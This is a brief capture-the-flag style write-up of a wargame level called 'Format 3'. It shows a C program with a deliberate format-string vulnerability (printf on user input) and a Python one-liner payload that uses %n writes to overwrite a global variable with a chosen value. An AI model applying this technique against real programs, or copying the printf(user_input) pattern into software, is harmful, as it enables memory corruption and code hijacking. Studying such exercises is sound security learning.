# Format 3

## Source Code

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void printbuffer(char *string)
{
  printf(string);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printbuffer(buffer);
  
  if(target == 0x01025544) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %08x :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}
```

## Challenge

Again we need to modify the `target` variable to `0x01025544` so we can do this in two wasy either using the same method as in format3 or we can modify the least significant byte of `target 0x080496f4` address once and then doing this repeatidily 4 times we can modify the whole address so i am gonna try the second method
so our payload will be

```
 python -c "print '\xf4\x96\x04\x08'+'JUNK'+'\xf5\x96\x04\x08'+'JUNK'+'\xf6\x96\x04\x08'+'JUNK'+'\xf7\x96\x04\x08'+'AA'+'%49x,'*11+'%n%17x%n%173x%n%255x%n'" | ./format3
```

![](images/format3_0.png)
